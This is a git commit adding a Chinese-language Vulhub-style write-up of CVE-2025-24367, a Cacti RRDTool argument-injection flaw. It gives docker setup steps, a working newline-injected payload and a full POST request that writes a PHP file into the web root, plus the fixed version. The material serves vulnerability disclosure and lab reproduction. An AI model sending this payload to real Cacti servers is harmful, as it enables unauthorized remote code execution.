update CVE-2025-24367

This commit is contained in:
Threekiii 2025-03-31 16:49:00 +08:00
parent 7a70b43b73
commit 689a441ac0
7 changed files with 83 additions and 0 deletions

View File

@ -0,0 +1,83 @@
# Cacti RRDTool 后台参数注入导致远程代码执行 CVE-2025-24367
## 漏洞描述
Cacti 是一款利用 RRDTool 数据存储和图形化功能的完整网络图形化解决方案。在 Cacti 1.2.28 及以前版本中存在一个命令注入漏洞,该漏洞允许已认证用户在 Web 服务器上创建任意 PHP 文件,从而可能导致远程代码执行。
此漏洞出现在图形模板功能中,用户输入的 RRDTool 命令参数,如 `--right-axis-label`,未被正确过滤。虽然 Cacti 尝试使用 `cacti_escapeshellarg()` 函数转义 shell 元字符,但它未能处理换行符。这允许攻击者突破预期的命令上下文并注入其他 RRDTool 命令,最终能够向 Web 根目录写入恶意 PHP 文件。
参考链接:
- https://github.com/Cacti/cacti/security/advisories/GHSA-fxrq-fr7h-9rqq
- https://github.com/Cacti/cacti/commit/c7e4ee798d263a3209ae6e7ba182c7b65284d8f0
## 漏洞影响
```
Cacti <= 1.2.28
```
## 环境搭建
Vulhub 执行如下命令启动 Cacti 1.2.28
```
docker compose up -d
```
服务启动后,访问 `http://your-ip:8080` 即可看到 Cacti 的登录界面,默认用户名密码为 admin/admin。
你需要登录并按照初始化指引操作,只需点击 "Next" 按钮直到看到成功页面即可。
![](images/Cacti%20RRDTool%20后台参数注入导致远程代码执行%20CVE-2025-24367/image-20250331154817035.png)
## 漏洞复现
在 Cacti 控制台,导航至 "Console → Templates → Graph",找到 "PING - Advanced Ping" 模板并编辑它。捕获这个编辑请求,然后修改 `right_axis_label` 参数为以下 payload请注意换行符 `%0a`
```
XXX
create my.rrd --step 300 DS:temp:GAUGE:600:-273:5000 RRA:AVERAGE:0.5:1:1200
graph vulhub.php -s now -a CSV DEF:out=my.rrd:temp:AVERAGE LINE1:out:<?=phpinfo();?>
# URLEncode
XXX%0Acreate+my.rrd+--step+300+DS%3Atemp%3AGAUGE%3A600%3A-273%3A5000+RRA%3AAVERAGE%3A0.5%3A1%3A1200%0Agraph+vulhub.php+-s+now+-a+CSV+DEF%3Aout%3Dmy.rrd%3Atemp%3AAVERAGE+LINE1%3Aout%3A%3C%3F%3Dphpinfo%28%29%3B%3F%3E%0A
```
发送请求包:
```
POST /graph_templates.php?header=false HTTP/1.1
Host: your-ip:8080
Accept-Language: en
Accept: */*
Origin: http://your-ip:8080
Accept-Encoding: gzip, deflate
Referer: http://your-ip:8080/graph_templates.php?action=template_edit&id=297
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie:
Content-Length: 590
__csrf_magic=sid%3A177b18c4669cf1f2ddb92b3fb5de63afe9aec9b0%2C1743407390&name=PING+-+Advanced+Ping&graph_template_id=297&graph_template_graph_id=297&save_component_template=1&title=%7Chost_description%7C+-+Advanced+Ping&vertical_label=milliseconds&image_format_id=3&height=200&width=700&base_value=1000&slope_mode=on&auto_scale_opts=1&upper_limit=10&lower_limit=0&unit_value=&unit_exponent_value=1&unit_length=&right_axis=&right_axis_label=XXX%0Acreate+my.rrd+--step+300+DS%3Atemp%3AGAUGE%3A600%3A-273%3A5000+RRA%3AAVERAGE%3A0.5%3A1%3A1200%0Agraph+xxx2.php+-s+now+-a+CSV+DEF%3Aout%3Dmy.rrd%3Atemp%3AAVERAGE+LINE1%3Aout%3A%3C%3F%3Dphpinfo%28%29%3B%3F%3E%0A&right_axis_format=0&right_axis_formatter=0&left_axis_formatter=0&tab_width=30&legend_position=0&legend_direction=0&rrdtool_version=1.7.2&action=save
```
![](images/Cacti%20RRDTool%20后台参数注入导致远程代码执行%20CVE-2025-24367/image-20250331161340124.png)
然后,来到 "Console → Create → New Graphs",使用 "PING - Advanced Ping" 模板创建一个新图表:
![](images/Cacti%20RRDTool%20后台参数注入导致远程代码执行%20CVE-2025-24367/image-20250331161504601.png)
之后,来到 "Graphs → Default Tree → Local Linux Machine" 来触发 payload 执行。你会看到一个带有 "Error: creating arguments" 错误消息的图像,这意味着 payload 已被执行:
![](images/Cacti%20RRDTool%20后台参数注入导致远程代码执行%20CVE-2025-24367/image-20250331161533096.png)
命令执行后payload 将在 Cacti 的 Web 根目录创建两个文件:一个 RRD 文件 `my.rrd` 和一个 phpinfo 页面 `xxx2.php`
![](images/Cacti%20RRDTool%20后台参数注入导致远程代码执行%20CVE-2025-24367/image-20250331161630295.png)
![](images/Cacti%20RRDTool%20后台参数注入导致远程代码执行%20CVE-2025-24367/image-20250331161928961.png)
## 漏洞修复
官方已发布 1.2.29 版本修复该漏洞,建议升级至最新版本。